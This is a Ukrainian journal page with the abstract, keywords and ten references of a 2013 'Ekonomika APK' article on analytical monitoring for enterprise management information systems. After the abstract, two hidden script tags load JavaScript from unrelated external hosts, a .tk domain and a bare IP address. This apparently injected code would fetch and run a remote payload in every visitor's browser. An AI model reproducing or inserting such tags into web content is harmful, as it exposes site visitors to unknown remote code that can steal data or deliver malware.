ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.162:657.1.001
Управління та інформаційне забезпечення

Аналітичний моніторинг у забезпеченні функціонування інформаційно-аналітичної системи управління діяльністю підприємств / Костенко О. М. // Економіка АПК. - 2013. - № 2 - С. 106

Визначено необхідність дослідження системи моніторингу діяльності суб’єктів господарювання, що дає змогу забезпечити формування та динамічні перетворення інформаційно-аналітичної системи управління, аналітичний моніторинг як організаційно-економічний механізм функціонування у векторі стратегічного орієнтування на забезпечення сталого розвитку діяльності підприємства, встановлено сутнісну характеристику аналітичного моніторингу як окремого виду, аргументовано його стратегічну спрямованість. Обґрунтовано визначальні чинники цільового призначення аналітичного моніторингу як складової частини організаційно-економічного механізму забезпечення функціонування інформаційно-аналітичної системи управління діяльністю підприємств. Бібліогр.: 10.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: аналітичний моніторинг, інформаційно-аналітична система, управління, економічний механізм

Список використаних джерел

  1. Галіцин В.К. Системи моніторингу : моногр. / В.К. Галіцин. - К. : КНЕУ, 2000. - 232 с.
  2. Грищенко О.В. Анализ и диагностика финансово-хозяйственной деятельности предприятия : учеб. пособ. / О.В. Грищенко. - Таган¬рог : Изд-во ТРТУ, 2000. - 112 с.
  3. Економічний аналіз : навч. посіб. / [Болюх М.А., Бурчевський В.З., Горбаток М.І. та ін.] ; за ред. М.Г. Чумаченка. [2-ге вид.]. - К. : КНЕУ, 2003. - 556 с.
  4. Корінъко М.Д. Контроль та аналіз діяльності суб’єктів господарювання в умовах її диверсифікації : теорія, методологія, організація / М.Д. Корінько. - К. : ДП «Інформ.-аналіт. агентство», 2007. - 430 с.
  5. Практичний словник синонімів української мови / [авт.-укл. Караванський С.]. - К. : «Українська книга», 2004. - 448 с.
  6. Савчук В.К. Аналитический менеджмент / В.К. Савчук // Развитие бухгалтерского учета и контроля в контексте европейской инте¬грации. - Житомир - Краматорск : ЧП «Рута». - 2005. - 588 с.
  7. Чупров С.В. Методы и технология мониторинга устойчивости промышленных предприятий / С.В. Чупров, А.Б. Каневский. - Иркутск : Изд-во БГУЭП, 2006. - 204 с.
  8. Яковлева А.М. Сучасний тлумачний словник української мови / AM. Яковлева, Т.М. Афонська. - Харків : ТОРСІНГ ПЛЮС, 2007. - 672 с.
  9. LehrerP.M. Principles and Practice of Management / P.M. Lehrer, R.L. Woolfolk- New York : Guilford, 2007. - 134 p.
  10. Takayama T. Analysis / T. Takayama. - Amsterdam : North-Holland, 1986. - 195 p.
Читати статтю: 13_02_18.pdf